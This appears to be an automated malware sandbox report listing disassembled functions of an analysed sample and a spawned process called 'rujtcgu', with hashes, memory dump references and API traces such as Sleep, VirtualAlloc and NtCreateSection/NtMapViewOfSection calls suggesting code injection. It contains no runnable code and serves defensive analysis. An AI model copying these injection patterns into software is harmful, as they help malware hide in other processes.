Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction ID: bf7558aa261c7e9f0bf3ab8e2195609813a6ede93c7c4eb9cfb164d9dfac32cf
Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction Fuzzy Hash: 13526B75A41229DFDB64CF58C984BACBBB1BF09314F1480D9E54DAB391DB30AA89CF14

Function 02E20E0F Relevance: 3.0, APIs: 2, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(00000400,?,?,02E20223,?,?), ref: 02E20E19
SetErrorMode.KERNELBASE(00000000,?,?,02E20223,?,?), ref: 02E20E1E

Memory Dump Source

Source File: 00000000.00000002.1710124459.0000000002E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e20000_file.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: 00dfb41ce48c535117d73a9952129246be58987ed129c26202745da8aced8991
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: D5D0123114512877DB002A94DC09BCD7B1CDF05B66F008011FB0DD9080C770954046E5

Function 004019B2 Relevance: 1.3, APIs: 1, Instructions: 65
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401A04

Part of subcall function 004015D5: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401697
Part of subcall function 004015D5: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016C4

Memory Dump Source

Source File: 00000000.00000002.1708711137.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: 04f6897abb308126f470fd05014cf238183fa8e61674ddeb0717af411a121877
Instruction ID: 9535be6c36f98077632f4f02dfbdda9f19971c7bea6acc9325b6b8c563985b13
Opcode Fuzzy Hash: 04f6897abb308126f470fd05014cf238183fa8e61674ddeb0717af411a121877
Instruction Fuzzy Hash: CD119EB530C204F7DB00AA959C92EBA32689B40754F304537F607B90F0E67D9A13EB6B

Function 004019CC Relevance: 1.3, APIs: 1, Instructions: 59
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401A04

Part of subcall function 004015D5: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401697
Part of subcall function 004015D5: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016C4

Memory Dump Source

Source File: 00000000.00000002.1708711137.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: 33c28c6db8310be9d0036b491102ae5ea51f8e5c4e2b4487472b9c1eca0431ce
Instruction ID: 9860b3adbb02253c11ca7fee9fca2776f08e165eea76d4ff876d2c90885662b8
Opcode Fuzzy Hash: 33c28c6db8310be9d0036b491102ae5ea51f8e5c4e2b4487472b9c1eca0431ce
Instruction Fuzzy Hash: FD017C7630C204F7DB00AA819892EBA32649B40754F304577F607B90F0D63D9A13EB1B

Function 004019BE Relevance: 1.3, APIs: 1, Instructions: 58
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401A04

Part of subcall function 004015D5: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401697
Part of subcall function 004015D5: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016C4

Memory Dump Source

Source File: 00000000.00000002.1708711137.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: a7c3ad1862dbfc6de84a841be9cc81f89f6a2c5f1f8df06033d8068c45b7fee5
Instruction ID: 6ea748b5703c6c3cc47f97f8384fa15d7aaa85e5df960e900962d61b5b42e5e1
Opcode Fuzzy Hash: a7c3ad1862dbfc6de84a841be9cc81f89f6a2c5f1f8df06033d8068c45b7fee5
Instruction Fuzzy Hash: 20018E7630C204F7DB00AA819C92EBA32645B44754F204577F607B90F0D67D9A13EB1B

Function 004019CF Relevance: 1.3, APIs: 1, Instructions: 54sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00001388), ref: 00401A04

Part of subcall function 004015D5: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401697
Part of subcall function 004015D5: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016C4

Memory Dump Source

Source File: 00000000.00000002.1708711137.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: 0cae673df1dcccc298252c6cb1d087753a000ea560dbf3a75727c984865d924c
Instruction ID: 1dabb258173db235a1d95cfc95eeffc66b9799adec5ca63ac31477e601607a68
Opcode Fuzzy Hash: 0cae673df1dcccc298252c6cb1d087753a000ea560dbf3a75727c984865d924c
Instruction Fuzzy Hash: 7701D675308204F7DB00ABD08C81AAE32689F40314F708177F613B81F0EA3D8612EB5B

Function 004019E7 Relevance: 1.3, APIs: 1, Instructions: 48sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00001388), ref: 00401A04

Part of subcall function 004015D5: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401697
Part of subcall function 004015D5: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016C4

Memory Dump Source

Source File: 00000000.00000002.1708711137.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: 188fd4d8d6eee7cd557e4d10eb30fffa0ab7ddb0591dde503fad6877693a3d2c
Instruction ID: 9426f979ca713991860f9ea44d55cd4c2553d935c0e8181050f05289ed5f003d
Opcode Fuzzy Hash: 188fd4d8d6eee7cd557e4d10eb30fffa0ab7ddb0591dde503fad6877693a3d2c
Instruction Fuzzy Hash: D401A776309204FBDB00AA959C41AAE37689F45310F204477F607B80F1E67D9A12AB2B

Function 02E52223 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 02E52274

Memory Dump Source

Source File: 00000000.00000002.1710342393.0000000002E4B000.00000040.00000020.00020000.00000000.sdmp, Offset: 02E4B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e4b000_file.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: 50a0d5ef62a5be6c7cca09a7297543447aacd389ddee97bed3d7e8e659788b7b
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: 18112B79A40208EFDB01DF98C985E98BBF5AF08350F05C094FA489B361D371EA50DF81

Non-executed Functions

Function 02E2092B Relevance: 3.8, Strings: 3, Instructions: 90COMMON

Download Yara Rule

Strings

GetProcAddress., xrefs: 02E209DC, 02E209DF, 02E209E4
., xrefs: 02E2095F
l, xrefs: 02E20966

Memory Dump Source

Source File: 00000000.00000002.1710124459.0000000002E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e20000_file.jbxd

Yara matches

Similarity

API ID:
String ID: .$GetProcAddress.$l
API String ID: 0-2784972518
Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction ID: 0622ab01cf25bf12907810ddac50a8e0dcdeee675db74ab547301bf2114fc0e0
Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction Fuzzy Hash: 583149B6901619DFDB10CF99C880AAEBBF5FF58328F14904AD442B7250D771EA49CFA4

Function 0040217B Relevance: .2, Instructions: 241COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1708711137.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e1da0c634a6d92d1791599be49c0a92e0b08a68521384ec08f651e4fd3c29d3
Instruction ID: b0f5cd621e5889a427523276a520302fa0894c53478b04dc76a98a6104f30da4
Opcode Fuzzy Hash: 6e1da0c634a6d92d1791599be49c0a92e0b08a68521384ec08f651e4fd3c29d3
Instruction Fuzzy Hash: 7D41CE632141086B9A41D2183D2709E3BE59BE235CB249BE7C973773FDD1A4C817A1D3

Function 0040217D Relevance: .2, Instructions: 240COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1708711137.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b997c0b0ad5099bc85e104db20f3434f9bfef6f8188c5eb21619fd16353aaaa8
Instruction ID: c68037642d2b4b88848a758ef480b741a8d613f7c2e242108568ac126d1cc187
Opcode Fuzzy Hash: b997c0b0ad5099bc85e104db20f3434f9bfef6f8188c5eb21619fd16353aaaa8
Instruction Fuzzy Hash: CB41CE63214108679A41D2183D2709E3AE59BE225CB249BE7C973773FDD1A4C817A1D3

Function 00402188 Relevance: .2, Instructions: 235COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1708711137.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d86b63182e58497ce22eab269b34fa37a60eac9ab51381e0997a6561d36ce3a1
Instruction ID: c31f878e4552ee647901d08c13c42c7b9bee46c5546bcd0e406724342d5d4055
Opcode Fuzzy Hash: d86b63182e58497ce22eab269b34fa37a60eac9ab51381e0997a6561d36ce3a1
Instruction Fuzzy Hash: D541CC632101086BDA41C7186C2709D3BE5ABE625CB25ABDAC9736B3FED164C817A183

Function 004021A1 Relevance: .2, Instructions: 228COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1708711137.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8b384b0ee208d3d6171e22600c510dc0043140f89b51a070c79228909bba0109
Instruction ID: f27c93ea5fb19a9126cdec7dfb901a61f64bd232b99ff7c89ab316a302d0d062
Opcode Fuzzy Hash: 8b384b0ee208d3d6171e22600c510dc0043140f89b51a070c79228909bba0109
Instruction Fuzzy Hash: 3231BC532101046B9E41C7183C2308E3AE5EFE265CB24ABDAC873673FDD160C81BA1C2

Function 004021CB Relevance: .2, Instructions: 223COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1708711137.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f652c5a769f7022461051059d30ad15d808e24512e8e9a39d5a36b1a3943f30e
Instruction ID: 71e4ad84544b767bcf39e9c9c4391c0157840b4eb49ede458eb3363319ddbd63
Opcode Fuzzy Hash: f652c5a769f7022461051059d30ad15d808e24512e8e9a39d5a36b1a3943f30e
Instruction Fuzzy Hash: 7C31BB532201086B5E41C7283C2308E3BE6EBE626CB25AFC6C873673FDD550C81BA0D2

Function 004021BB Relevance: .2, Instructions: 221COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1708711137.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7b4459f28dd9a1f9efe99075b70b48fb1a8b60b7d1a7da5155ac1ea3fa4accf4
Instruction ID: b6ca5711a50b7efee0159f302846c4b9acddd6f1e8c6f36e454589e31c9923f4
Opcode Fuzzy Hash: 7b4459f28dd9a1f9efe99075b70b48fb1a8b60b7d1a7da5155ac1ea3fa4accf4
Instruction Fuzzy Hash: 7C3167532115086B5F41D7286C2308E3BE6ABE626DB15ABC6C873673FED550C82BA1D2

Function 00402348 Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1708711137.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8390d9e052f2bd0000ec68267d667f6d37540f8d2bf5ab16a5193d2387661f5d
Instruction ID: 20921a196d2f70f336c197afbd25194a591e440cc2018bb72a27b8d2cfd76f32
Opcode Fuzzy Hash: 8390d9e052f2bd0000ec68267d667f6d37540f8d2bf5ab16a5193d2387661f5d
Instruction Fuzzy Hash: D4215A73615264CBD3019B18914B45177F0FF81348B2044BBCC83AB2E2D6F9C957969B

Function 02E51E41 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1710342393.0000000002E4B000.00000040.00000020.00020000.00000000.sdmp, Offset: 02E4B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e4b000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction ID: 4d96498d11094c8314e594288b62f3bbc9249a368a535a05ea26f35962193d7a
Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction Fuzzy Hash: FA11CE72390110AFD740DF55DCD0FA673EAEB88224B198065ED08CF305EAB5EC01CB60

Function 02E20D90 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1710124459.0000000002E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e20000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
Instruction ID: d2a9083595d6ee6a256dc2e8d6a0012d07527aa321de95ca19ac6d920076e272
Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
Instruction Fuzzy Hash: B701F7766516108FDF21CF20C804BAA33F5EB96309F0590A4D507972C1E370A9458B80

Function 00402745 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1708711137.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dce77baa00da61873ccb3aa1e018f8e5fad55bea42f980cc92786ab105a08859
Instruction ID: 69d4b880b733b20b6e6e8d40225c1187dfda2853922bf69f6b380452bfed4421
Opcode Fuzzy Hash: dce77baa00da61873ccb3aa1e018f8e5fad55bea42f980cc92786ab105a08859
Instruction Fuzzy Hash: 95D0A7321D8ABD0E873BAF242405B4B3F91F99D4807D4158CC4D2CF189CB20D593DB84

Function 004026D2 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1708711137.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f58bfef414fbb703d3dd54ed49dc08676aa3255ce4442ffadb9c2f16a394118f
Instruction ID: a8b0c3d885e26e12b4b78e6b62be43aeff16635af6dcc451826105f71ea5402b
Opcode Fuzzy Hash: f58bfef414fbb703d3dd54ed49dc08676aa3255ce4442ffadb9c2f16a394118f
Instruction Fuzzy Hash: E2C02B722C1E336B9B08A10C8CE2BDFF6885936400388100444C2D72C0C300E05304F7

Function 004027A0 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1708711137.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c8559ce6b849e8630471a8e5d616feba08a7a26a2c0d8d38af4418daa939d9c
Instruction ID: 38351c2ed745b14c386feeb15f7f798b9746b37af39e32a5701b5c9e944eb928
Opcode Fuzzy Hash: 0c8559ce6b849e8630471a8e5d616feba08a7a26a2c0d8d38af4418daa939d9c
Instruction Fuzzy Hash: 62C0923264112BCFC6358F2DC48CBD573B7AA9970338705AAC8818741ADB20E1AB8F48

Function 00402770 Relevance: .0, Instructions: 3COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1708711137.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d42159c6503ca90542c3670edd716fcc7f47a8373946eeb85d274a3b270e0fcb
Instruction ID: 4231ba0c904557ffbbe8bc52a0ffdfb71a90202ecc68a120afadf1cd8174fbf3
Opcode Fuzzy Hash: d42159c6503ca90542c3670edd716fcc7f47a8373946eeb85d274a3b270e0fcb
Instruction Fuzzy Hash:

Analysis Process: rujtcguPID: 2132, Parent PID: 1044COMMON

Execution Graph

Execution Coverage:	6.3%
Dynamic/Decrypted Code Coverage:	51.9%
Signature Coverage:	0%
Total number of Nodes:	52
Total number of Limit Nodes:	3

Executed Functions

Function 0040156B Relevance: 10.7, APIs: 7, Instructions: 229
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000004.00000002.1980980465.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_rujtcgu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9c550399e78a4170f2f5d29d07dc02536ee10777f5cb6a9f829c2ebd2296549f
Instruction ID: 4068bc8a221ecf0939acbdb1e7e88c7e46ae7771e33a0dc799c943c57428cfd7
Opcode Fuzzy Hash: 9c550399e78a4170f2f5d29d07dc02536ee10777f5cb6a9f829c2ebd2296549f
Instruction Fuzzy Hash: AC717CB4900205BFDB209F91CC48F9BBFB8FF96710F14416AFA52BA2E5D6749901CB64

Function 004015D5 Relevance: 10.7, APIs: 7, Instructions: 206
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401697
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016C4
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016E7
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401705
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401746
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401777
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401799

Memory Dump Source

Source File: 00000004.00000002.1980980465.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_rujtcgu.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 3e181e0f091291a7bcc65ea4cbb03b61709e80b03e4eaee54da447a390a899e9
Instruction ID: 31d3dea579921dc9a2cae9d470b126ee15754b3dfc7efa49c87a4de0449774b7
Opcode Fuzzy Hash: 3e181e0f091291a7bcc65ea4cbb03b61709e80b03e4eaee54da447a390a899e9
Instruction Fuzzy Hash: 3D615EB4900205FBEF209F95CC49FAF7BB8EF81700F14412AFA52BA1E4D6759901DB65

Function 00401603 Relevance: 10.7, APIs: 7, Instructions: 180
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401697
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016C4
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016E7

Memory Dump Source

Source File: 00000004.00000002.1980980465.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_rujtcgu.jbxd

Similarity

API ID: Section$CreateDuplicateObjectView
String ID:
API String ID: 1652636561-0
Opcode ID: b15bfa31299a4de99dc5fbb09a0d922efddb8920de5fe92507006c0b369db749
Instruction ID: 0ca0715bd940020d1e7da968824c045868daa20d03b9e32912d168e5fb042320
Opcode Fuzzy Hash: b15bfa31299a4de99dc5fbb09a0d922efddb8920de5fe92507006c0b369db749
Instruction Fuzzy Hash: 21513AB4900245BFEF209F91CC48FAB7BB8EF86700F144159FA11BA1A5D6759901CB24

Function 004015E0 Relevance: 10.7, APIs: 7, Instructions: 177
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401697
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016C4
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016E7
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401705
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401746
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401777
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401799

Memory Dump Source

Source File: 00000004.00000002.1980980465.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_rujtcgu.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 04eb20433b5860dced4f30358d53dad77e0caca42b63522b0a9d39180673331f
Instruction ID: f8a4b5919756d8021f5b889f0f58571870373b5bf4bcbac62585d3645815d21d
Opcode Fuzzy Hash: 04eb20433b5860dced4f30358d53dad77e0caca42b63522b0a9d39180673331f
Instruction Fuzzy Hash: 1D512AB4900245BFEF209F91CC48FAB7BB8EF85B00F14416AFA11BA1A5D6759945CB24

Function 004015F1 Relevance: 10.7, APIs: 7, Instructions: 177
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401697
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016C4
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016E7
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401705
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401746
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401777
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401799

Memory Dump Source

Source File: 00000004.00000002.1980980465.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_rujtcgu.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 33ac70b5b43b6acd6d344138c7c65f11e9e4a1672503bef4bbae75314ef4305b
Instruction ID: 5a7ae9765c1c855b3f83e93a3bcaaff71aa811e3383dbed8b01ddf0fe81d9004
Opcode Fuzzy Hash: 33ac70b5b43b6acd6d344138c7c65f11e9e4a1672503bef4bbae75314ef4305b
Instruction Fuzzy Hash: CD512AB4900205BBEF209F91CC49FAB7BB8EF85B00F14412AFA11BA1E5D6759941CB24

Function 004015F5 Relevance: 10.7, APIs: 7, Instructions: 171
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401697
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016C4
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016E7
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401705
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401746
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401777
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401799

Memory Dump Source

Source File: 00000004.00000002.1980980465.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_rujtcgu.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 093e4af39a6e9b280214902670a608798f3f560288f35baa23b2d456886eb4a6
Instruction ID: 051afd1cfa3f53c1d66a227bdc9b807376e364d6cbb67a4c48344ec6a8846052
Opcode Fuzzy Hash: 093e4af39a6e9b280214902670a608798f3f560288f35baa23b2d456886eb4a6
Instruction Fuzzy Hash: A5512AB4900205BFEF209F91CC48FAF7BB8EF85B00F144169FA11BA1E5D6759941CB24

Function 004015F8 Relevance: 10.7, APIs: 7, Instructions: 170
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401697
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016C4
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016E7
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401705
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401746
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401777
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401799

Memory Dump Source

Source File: 00000004.00000002.1980980465.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_rujtcgu.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 49cdd7e1c93eceed419c410d8f1c7ea39d36b456fb8bebdc5244cfb81669af5b
